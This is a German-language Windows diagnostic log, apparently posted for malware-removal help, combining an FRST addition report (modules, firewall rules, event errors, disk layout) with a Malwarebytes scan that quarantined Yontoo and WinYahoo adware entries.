2016-01-06 23:40 - 2015-11-22 11:47 - 02653816 _____ () C:\Windows\System32\CoreUIComponents.dll
2016-01-06 23:40 - 2015-12-07 05:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-01-06 23:40 - 2015-12-07 05:00 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-06-25 16:34 - 2015-06-25 16:34 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2015-06-25 16:37 - 2015-06-25 16:37 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2015-06-25 16:35 - 2015-06-25 16:35 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2015-06-25 16:38 - 2015-06-25 16:38 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2015-06-25 15:53 - 2015-06-25 15:53 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
2015-06-25 15:51 - 2015-06-25 15:51 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2016-01-13 12:34 - 2016-01-05 02:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-13 12:34 - 2016-01-05 02:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-01-13 12:34 - 2016-01-05 02:24 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-01-13 12:34 - 2016-01-05 02:26 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-01-30 21:05 - 2008-12-28 11:19 - 01642496 _____ () C:\Users\Patrick\Downloads\Sai 1.1.0\sai.exe
2015-07-08 23:18 - 2015-07-08 23:18 - 00794920 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 16.0.0\kpcengine.2.3.dll
2015-12-05 10:21 - 2015-12-05 10:21 - 00933056 ____R () C:\Program Files (x86)\Skype\Phone\ssScreenVVS2.dll
2016-01-08 13:11 - 2016-01-08 13:11 - 00153032 _____ () C:\Program Files (x86)\Mozilla Thunderbird\NSLDAP32V60.dll
2016-01-08 13:11 - 2016-01-08 13:11 - 00022472 _____ () C:\Program Files (x86)\Mozilla Thunderbird\NSLDAPPR32V60.dll
2016-01-07 10:00 - 2015-11-10 20:55 - 00778752 _____ () E:\Steam\SDL2.dll
2016-01-07 10:00 - 2015-07-03 17:12 - 04962816 _____ () E:\Steam\v8.dll
2016-01-07 10:00 - 2015-12-14 21:01 - 02547280 _____ () E:\Steam\video.dll
2016-01-07 10:00 - 2015-07-03 17:12 - 01556992 _____ () E:\Steam\icui18n.dll
2016-01-07 10:00 - 2015-07-03 17:12 - 01187840 _____ () E:\Steam\icuuc.dll
2016-01-07 10:00 - 2015-09-24 01:33 - 02549248 _____ () E:\Steam\libavcodec-56.dll
2016-01-07 10:00 - 2015-09-24 01:33 - 00491008 _____ () E:\Steam\libavformat-56.dll
2016-01-07 10:00 - 2015-09-24 01:33 - 00332800 _____ () E:\Steam\libavresample-2.dll
2016-01-07 10:00 - 2015-09-24 01:33 - 00442880 _____ () E:\Steam\libavutil-54.dll
2016-01-07 10:00 - 2015-09-24 01:33 - 00485888 _____ () E:\Steam\libswscale-3.dll
2016-01-07 10:00 - 2015-12-14 21:01 - 00804432 _____ () E:\Steam\bin\chromehtml.DLL
2016-01-07 10:00 - 2015-11-03 23:00 - 00201728 _____ () E:\Steam\bin\openvr_api.dll
2016-01-07 10:00 - 2015-11-17 01:31 - 47846176 _____ () E:\Steam\bin\libcef.dll
2016-01-07 10:00 - 2015-09-25 00:56 - 00119208 _____ () E:\Steam\winh264.dll
2016-01-30 21:05 - 2008-11-13 05:37 - 00499712 _____ () C:\Users\Patrick\Downloads\Sai 1.1.0\sfl.dll
2016-01-28 18:03 - 2016-01-28 18:03 - 00511488 _____ () C:\ProgramData\da0545d9\f349c2eb.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
==================== Hosts Inhalt: ===============================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2015-10-30 08:24 - 2015-10-30 08:21 - 00000824 ____N C:\Windows\system32\Drivers\etc\hosts
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-1478378272-1933348484-2964354189-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{29E879EA-F8C6-44B3-A950-D33E9E79C5A6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{AC99FE8D-9AE8-45D0-A5A1-B96226A66F96}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{CB393BEE-2C72-450A-9B1B-A6E73FF623AA}] => (Allow) E:\Steam\Steam.exe
FirewallRules: [{C465BE65-56F3-4C79-9827-CE78B191B2B4}] => (Allow) E:\Steam\Steam.exe
FirewallRules: [{F26587F3-5210-4C52-B4DD-0043FEC8486D}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{CC07F85F-FCF5-4047-80DC-07CBA867A7F0}] => (Allow) E:\Steam\bin\steamwebhelper.exe
FirewallRules: [{C045FD02-9873-4D8F-AFD2-9B09DCFF74D7}] => (Allow) E:\Steam\bin\steamwebhelper.exe
FirewallRules: [{69A84241-BDF3-4826-916A-2C7D95363318}] => (Allow) E:\Steam\steamapps\common\FTL Faster Than Light\FTLGame.exe
FirewallRules: [{779AA0B8-C619-4BDE-BC9E-644DA00EB349}] => (Allow) E:\Steam\steamapps\common\FTL Faster Than Light\FTLGame.exe
FirewallRules: [{E47BF190-1C54-402E-A96A-D30D79732D25}] => (Allow) E:\Steam\steamapps\common\Ori\ori.exe
FirewallRules: [{CC631FC6-0A8F-48B7-B685-9017C41F04C8}] => (Allow) E:\Steam\steamapps\common\Ori\ori.exe
FirewallRules: [{3DE33AA1-F251-48AA-BB4C-C7C92F8D806C}] => (Allow) E:\Steam\steamapps\common\Dust An Elysian Tail\DustAET.exe
FirewallRules: [{E18250ED-6C94-42F3-9429-8AEA89E1A17F}] => (Allow) E:\Steam\steamapps\common\Dust An Elysian Tail\DustAET.exe
FirewallRules: [{B881DBC5-B9F7-4570-85F9-046FD8CD5430}] => (Allow) E:\Steam\steamapps\common\Special Edition\DevilMayCry4SpecialEdition.exe
FirewallRules: [{10810861-7AEE-4FDD-AFED-15D4A122079D}] => (Allow) E:\Steam\steamapps\common\Special Edition\DevilMayCry4SpecialEdition.exe
FirewallRules: [{966507CF-F448-4EE0-AA7A-012F922599E9}] => (Allow) E:\Steam\steamapps\common\Dungeon Defenders 2\DunDefLauncher.exe
FirewallRules: [{AA78592B-E9BF-40FC-ACC2-1F94C2DCED0E}] => (Allow) E:\Steam\steamapps\common\Dungeon Defenders 2\DunDefLauncher.exe
FirewallRules: [{2DE1F193-0044-49E5-B57E-4C21801285F4}] => (Allow) E:\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{CB6F49B8-C92D-446C-8C3B-8348495B0DFF}] => (Allow) E:\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{8A208580-4B6D-437F-9796-FF11161EF2D9}] => (Allow) F:\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{7D855F48-CA4D-463E-B5E6-C36D7DB72B8A}] => (Allow) F:\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{4D37723C-F69A-4762-9E15-9F54B62FD987}] => (Allow) C:\Users\Patrick\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe
FirewallRules: [{954D70B6-DEE5-4109-9FAB-D24831CFF65D}] => (Allow) F:\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe
FirewallRules: [{6D96A433-D664-4C26-A6C7-249C8E50B98C}] => (Allow) F:\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{0E799DB8-D7A7-47FB-802E-151A7D8D6E87}] => (Allow) F:\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{E8264F06-5D05-4DA4-A45B-A7D11B3B661B}] => (Allow) C:\Users\Patrick\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe
FirewallRules: [{E80B7CEA-7AD7-4DF3-A54B-08B078AFDF11}] => (Allow) F:\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe
FirewallRules: [{B3B24AF5-230A-41C0-A6A9-D641DFD83479}] => (Allow) E:\Steam\steamapps\common\Undertale\UNDERTALE.exe
FirewallRules: [{E35559EC-4B53-40BF-9118-8011F05494D2}] => (Allow) E:\Steam\steamapps\common\Undertale\UNDERTALE.exe
FirewallRules: [{760A4E18-FBAD-475A-A85E-A861C00B8A1D}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{E82AA3CD-CBC2-4212-AE29-D04084E5687E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{097F7DBF-6225-46DF-91CB-DA95038D48EA}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{7A171D41-A74E-49B7-BB37-D0BF1C39E397}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
==================== Wiederherstellungspunkte =========================
14-01-2016 04:38:54 Installed Warframe
21-01-2016 19:04:15 Geplanter Prüfpunkt
28-01-2016 09:31:44 Windows Update
==================== Fehlerhafte Geräte im Gerätemanager =============
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (01/30/2016 07:08:13 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Fehler bei der Lizenzaktivierung (slui.exe). Fehlercode:
hr=0x803F7001
Befehlszeilenargumente:
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (01/30/2016 07:08:12 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Fehler bei der Lizenzaktivierung (slui.exe). Fehlercode:
hr=0x803F7001
Befehlszeilenargumente:
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1
Error: (01/30/2016 05:59:15 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Fehler bei der Lizenzaktivierung (slui.exe). Fehlercode:
hr=0x803F7001
Befehlszeilenargumente:
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (01/30/2016 05:59:14 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Fehler bei der Lizenzaktivierung (slui.exe). Fehlercode:
hr=0x803F7001
Befehlszeilenargumente:
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (01/30/2016 05:59:14 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Fehler bei der Lizenzaktivierung (slui.exe). Fehlercode:
hr=0x803F7001
Befehlszeilenargumente:
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1
Error: (01/30/2016 05:59:10 PM) (Source: ESENT) (EventID: 454) (User: )
Description: svchost (1504) SRUJet: Unerwarteter Fehler "-1216" bei der Datenbankwiederherstellung.
Error: (01/30/2016 05:59:10 PM) (Source: ESENT) (EventID: 494) (User: )
Description: svchost (1504) SRUJet: Fehler -1216 bei der Datenbankwiederherstellung, da Verweise auf die Datenbank "C:\Windows\system32\SRU\SRUDB.dat" festgestellt wurden, die nicht mehr vorhanden ist. Die Datenbank wurde nicht sauber heruntergefahren, bevor sie entfernt (oder möglicherweise verschoben oder umbenannt) wurde. Das Datenbankmodul lässt den Abschluss der Wiederherstellung für diese Instanz erst dann zu, wenn die fehlende Datenbank wieder verfügbar gemacht wird. Wenn die Datenbank tatsächlich nicht mehr verfügbar oder nicht mehr erforderlich ist, finden Sie Informationen zum Beheben dieses Fehlers in der Microsoft Knowledge Base oder unter dem Link "Weitere Informationen" am Ende dieser Meldung.
Error: (01/30/2016 05:57:30 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-BE1B4VG)
Description: Bei der Aktivierung der App „Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI“ ist folgender Fehler aufgetreten: -2147024891. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.
Error: (01/30/2016 07:23:17 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Fehler bei der Lizenzaktivierung (slui.exe). Fehlercode:
hr=0x803F7001
Befehlszeilenargumente:
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (01/30/2016 07:17:49 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Fehler bei der Lizenzaktivierung (slui.exe). Fehlercode:
hr=0x8024402C
Befehlszeilenargumente:
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=NetworkAvailable
Systemfehler:
=============
Error: (01/30/2016 07:08:11 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTNetzwerkdienstS-1-5-20LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar
Error: (01/30/2016 07:08:11 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTNetzwerkdienstS-1-5-20LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar
Error: (01/30/2016 05:59:29 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTSYSTEMS-1-5-18LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar
Error: (01/30/2016 05:59:18 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT-AUTORITÄT)
Description: Installationsfehler: Die Installation des folgenden Updates ist mit Fehler 0x80070005 fehlgeschlagen: Kumulatives Update für Windows 10 Version 1511 für x64-basierte Systeme (KB3124262)
Error: (01/30/2016 05:59:14 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTNetzwerkdienstS-1-5-20LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar
Error: (01/30/2016 05:59:13 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTNetzwerkdienstS-1-5-20LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar
Error: (01/30/2016 05:59:13 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTNetzwerkdienstS-1-5-20LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar
Error: (01/30/2016 05:58:29 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: Der Versuch des Dienststeuerungs-Managers, nach dem unerwarteten Beenden des Dienstes "Benutzerdatenspeicher _26be9" Korrekturmaßnahmen (Neustart des Diensts) durchzuführen, ist fehlgeschlagen. Fehler:
%%1056
Error: (01/30/2016 05:58:19 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenzugriff_26be9" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.
Error: (01/30/2016 05:58:19 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenspeicher _26be9" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.
CodeIntegrity:
===================================
Date: 2016-01-29 01:18:43.074
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-28 20:19:08.564
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-28 20:18:15.736
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-15 12:33:14.125
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-14 12:27:59.491
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-13 03:18:11.576
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-08 16:44:48.357
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-08 12:08:03.205
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-07 23:13:32.394
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-07 14:28:39.156
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
==================== Speicherinformationen ===========================
Prozessor: Intel(R) Xeon(R) CPU E3-1231 v3 @ 3.40GHz
Prozentuale Nutzung des RAM: 25%
Installierter physikalischer RAM: 16303.04 MB
Verfügbarer physikalischer RAM: 12072.02 MB
Summe virtueller Speicher: 18735.04 MB
Verfügbarer virtueller Speicher: 13911.07 MB
==================== Laufwerke ================================
Drive c: () (Fixed) (Total:119.27 GB) (Free:88.76 GB) NTFS ==>[Laufwerk mit Startkomponenten (eingeholt von BCD)]
Drive e: (Volume) (Fixed) (Total:113.61 GB) (Free:37.69 GB) NTFS
Drive f: (Volume) (Fixed) (Total:931.51 GB) (Free:908.85 GB) NTFS
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: F43BE46E)
Partition 1: (Active) - (Size=119.3 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=113.6 GB) - (Type=07 NTFS)
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: F43BE476)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)
==================== Ende von Addition.txt ============================ --- --- --- Code:
Malwarebytes Anti-Malware
www.malwarebytes.org
Suchlaufdatum: 29.01.2016
Suchlaufzeit: 15:50
Protokolldatei: MBAM.txt
Administrator: Ja
Version: 2.2.0.1024
Malware-Datenbank: v2016.01.29.03
Rootkit-Datenbank: v2016.01.20.01
Lizenz: Testversion
Malware-Schutz: Aktiviert
Schutz vor bösartigen Websites: Aktiviert
Selbstschutz: Deaktiviert
Betriebssystem: Windows 10
CPU: x64
Dateisystem: NTFS
Benutzer: Patrick
Suchlauftyp: Bedrohungssuchlauf
Ergebnis: Abgeschlossen
Durchsuchte Objekte: 336407
Abgelaufene Zeit: 2 Min., 32 Sek.
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Aktiviert
PUM: Aktiviert
Prozesse: 0
(keine bösartigen Elemente erkannt)
Module: 0
(keine bösartigen Elemente erkannt)
Registrierungsschlüssel: 12
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\APPID\{20577ecb-a5c6-46fb-9c1c-53474798f5ee}, In Quarantäne, [6700ae910099f54142c63a2a06fc1de3],
PUP.Optional.Yontoo, HKLM\SOFTWARE\WOW6432NODE\CLASSES\APPID\{20577ECB-A5C6-46FB-9C1C-53474798F5EE}, In Quarantäne, [6700ae910099f54142c63a2a06fc1de3],
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\WOW6432NODE\APPID\{20577ECB-A5C6-46FB-9C1C-53474798F5EE}, In Quarantäne, [6700ae910099f54142c63a2a06fc1de3],
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\APPID\{2869831e-57d4-41fe-8330-aad9ad2c6554}, In Quarantäne, [fe698cb33366c373c7fe5b3cf70b6f91],
PUP.Optional.Yontoo, HKLM\SOFTWARE\WOW6432NODE\CLASSES\APPID\{2869831E-57D4-41FE-8330-AAD9AD2C6554}, In Quarantäne, [fe698cb33366c373c7fe5b3cf70b6f91],
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\WOW6432NODE\APPID\{2869831E-57D4-41FE-8330-AAD9AD2C6554}, In Quarantäne, [fe698cb33366c373c7fe5b3cf70b6f91],
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\APPID\{9317b373-f854-47a9-b384-bf199504f5e9}, In Quarantäne, [98cf80bfa0f9ce68d8ec4e49669c3dc3],
PUP.Optional.Yontoo, HKLM\SOFTWARE\WOW6432NODE\CLASSES\APPID\{9317B373-F854-47A9-B384-BF199504F5E9}, In Quarantäne, [98cf80bfa0f9ce68d8ec4e49669c3dc3],
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\WOW6432NODE\APPID\{9317B373-F854-47A9-B384-BF199504F5E9}, In Quarantäne, [98cf80bfa0f9ce68d8ec4e49669c3dc3],
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\APPID\{ea00416e-38d2-43dd-8736-5ddb856858f7}, In Quarantäne, [bdaa261981186ccab8511450966cfa06],
PUP.Optional.Yontoo, HKLM\SOFTWARE\WOW6432NODE\CLASSES\APPID\{EA00416E-38D2-43DD-8736-5DDB856858F7}, In Quarantäne, [bdaa261981186ccab8511450966cfa06],
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\WOW6432NODE\APPID\{EA00416E-38D2-43DD-8736-5DDB856858F7}, In Quarantäne, [bdaa261981186ccab8511450966cfa06],
Registrierungswerte: 0
(keine bösartigen Elemente erkannt)
Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)
Ordner: 0
(keine bösartigen Elemente erkannt)
Dateien: 1
PUP.Optional.WinYahoo, C:\Program Files (x86)\Mozilla Firefox\browser\extensions\jid1-G80Ec8LLEbK5fQ@jetpack.xpi, In Quarantäne, [e582c17efc9dfe38374b5ee462a22ad6],
Physische Sektoren: 0
(keine bösartigen Elemente erkannt)
(end) |